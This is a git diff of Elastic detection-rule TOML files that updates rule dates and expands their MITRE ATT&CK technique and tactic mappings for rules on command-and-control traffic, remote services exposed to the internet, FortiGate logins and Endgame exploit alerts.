"https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml index 8c04edd604d..e8d45581eff 100644 --- a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml +++ b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -123,19 +123,44 @@ Compilers transform source code into executable programs, a crucial step in soft - Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1588" name = "Obtain Capabilities" reference = "https://attack.mitre.org/techniques/T1588/" + [[rule.threat.technique.subtechnique]] id = "T1588.001" name = "Malware" reference = "https://attack.mitre.org/techniques/T1588/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/network/collection_fortigate_config_download.toml b/rules/network/collection_fortigate_config_download.toml index eaca75f0e0a..f64d546a663 100644 --- a/rules/network/collection_fortigate_config_download.toml +++ b/rules/network/collection_fortigate_config_download.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,18 +74,36 @@ any where event.dataset == "fortinet_fortigate.log" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1602" name = "Data from Configuration Repository" reference = "https://attack.mitre.org/techniques/T1602/" + [[rule.threat.technique.subtechnique]] id = "T1602.002" name = "Network Device Configuration Dump" reference = "https://attack.mitre.org/techniques/T1602/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml index e586f7519a8..9f96571874e 100644 --- a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml +++ b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw", "fortinet_fortigate", "sonicwall_firewall", "suricata"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,32 +104,43 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_cobalt_strike_beacon.toml b/rules/network/command_and_control_cobalt_strike_beacon.toml index c5d168d66d3..9e8db1efdd1 100644 --- a/rules/network/command_and_control_cobalt_strike_beacon.toml +++ b/rules/network/command_and_control_cobalt_strike_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,24 +82,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml index 3e98f2fdb7b..10408f201b2 100644 --- a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml +++ b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/04/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,23 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - +[[rule.threat.technique]] +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_fin7_c2_behavior.toml b/rules/network/command_and_control_fin7_c2_behavior.toml index 038ab832275..3a265f93e6b 100644 --- a/rules/network/command_and_control_fin7_c2_behavior.toml +++ b/rules/network/command_and_control_fin7_c2_behavior.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -43,24 +43,28 @@ destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destinati [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_halfbaked_beacon.toml b/rules/network/command_and_control_halfbaked_beacon.toml index 1330bc27526..38b3cbc3b54 100644 --- a/rules/network/command_and_control_halfbaked_beacon.toml +++ b/rules/network/command_and_control_halfbaked_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,24 +80,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_nat_traversal_port_activity.toml b/rules/network/command_and_control_nat_traversal_port_activity.toml index e70052c7f23..e7177215bac 100644 --- a/rules/network/command_and_control_nat_traversal_port_activity.toml +++ b/rules/network/command_and_control_nat_traversal_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,8 +75,22 @@ IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by e [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" + +[[rule.threat.technique]] +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_port_26_activity.toml b/rules/network/command_and_control_port_26_activity.toml index 2f266661300..9749d6d34aa 100644 --- a/rules/network/command_and_control_port_26_activity.toml +++ b/rules/network/command_and_control_port_26_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,20 +75,35 @@ SMTP, typically operating on port 25, is crucial for email transmission. However [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.003" +name = "Mail Protocols" +reference = "https://attack.mitre.org/techniques/T1071/003/" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml index 1c67c535c25..1eb5e77188c 100644 --- a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml +++ b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,28 +117,39 @@ framework = "MITRE ATT&CK" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml index bdb7850821e..0ba2b3d849c 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,26 +108,31 @@ VNC allows remote control of systems, facilitating maintenance and resource shar [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml index 99c927ca904..c139975d32f 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,14 +109,31 @@ VNC is a tool that allows remote control of computers, often used by administrat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.005" +name = "VNC" +reference = "https://attack.mitre.org/techniques/T1021/005/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/network/discovery_potential_network_sweep_detected.toml b/rules/network/discovery_potential_network_sweep_detected.toml index 0659815cbd5..823d7a5bdf6 100644 --- a/rules/network/discovery_potential_network_sweep_detected.toml +++ b/rules/network/discovery_potential_network_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,6 +81,11 @@ Network sweeps are reconnaissance techniques where attackers scan networks to id [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -108,7 +113,6 @@ reference = "https://attack.mitre.org/techniques/T1595/001/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" - [rule.threshold] field = ["source.ip"] value = 1 diff --git a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml index 83e4f3cdfb2..d4441732d8b 100644 --- a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml +++ b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,19 +95,41 @@ FROM logs-fortinet_fortigate.* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1606" +name = "Forge Web Credentials" +reference = "https://attack.mitre.org/techniques/T1606/" + +[[rule.threat.technique.subtechnique]] +id = "T1606.002" +name = "SAML Tokens" +reference = "https://attack.mitre.org/techniques/T1606/002/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml index 492129f623e..1ee0865b265 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,14 +101,18 @@ RPC enables remote management and resource sharing, crucial for system administr [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml index 2072a632c94..23d4284cac2 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,14 +100,31 @@ RPC enables remote management and resource sharing across networks, crucial for [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml index 3e4f65b7211..6660e0dc3aa 100644 --- a/rules/network/initial_access_unsecure_elasticsearch_node.toml +++ b/rules/network/initial_access_unsecure_elasticsearch_node.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/11" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,14 +79,26 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/network/lateral_movement_dns_server_overflow.toml b/rules/network/lateral_movement_dns_server_overflow.toml index 38b0ec200b3..829273358eb 100644 --- a/rules/network/lateral_movement_dns_server_overflow.toml +++ b/rules/network/lateral_movement_dns_server_overflow.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["network_traffic"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,14 +79,31 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" + +[[rule.threat.technique.subtechnique]] +id = "T1499.004" +name = "Application or System Exploitation" +reference = "https://attack.mitre.org/techniques/T1499/004/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml b/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml index 432f9d326c7..12e946d8171 100644 --- a/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml +++ b/rules/network/persistence_fortigate_sso_login_followed_by_admin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,18 +79,31 @@ sequence by observer.name with maxspan=15m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/promotions/execution_endgame_exploit_detected.toml b/rules/promotions/execution_endgame_exploit_detected.toml index c74ed775d20..a39b6038b0d 100644 --- a/rules/promotions/execution_endgame_exploit_detected.toml +++ b/rules/promotions/execution_endgame_exploit_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,20 +78,25 @@ Elastic Endgame is a security solution that monitors and detects exploit attempt [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/execution_endgame_exploit_prevented.toml b/rules/promotions/execution_endgame_exploit_prevented.toml index 9882090ac4d..4d457df5da8 100644 --- a/rules/promotions/execution_endgame_exploit_prevented.toml +++ b/rules/promotions/execution_endgame_exploit_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,20 +80,25 @@ Elastic Endgame is a security solution designed to prevent exploits by monitorin [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml index da56645fb6b..6368ebe68c5 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,14 +72,18 @@ Elastic Endgame is a security solution that monitors and detects unauthorized ac [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml index 9b43b081eca..e9b282cff18 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,14 +72,18 @@ Elastic Endgame is a security solution that prevents unauthorized access by moni [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml index 97ba3fb44a3..972be2ad55e 100644 --- a/rules/windows/collection_email_powershell_exchange_mailbox.toml +++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,6 +102,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" @@ -111,32 +112,36 @@ reference = "https://attack.mitre.org/techniques/T1005/" id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique.subtechnique]] +id = "T1114.001" +name = "Local Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/001/" + [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + 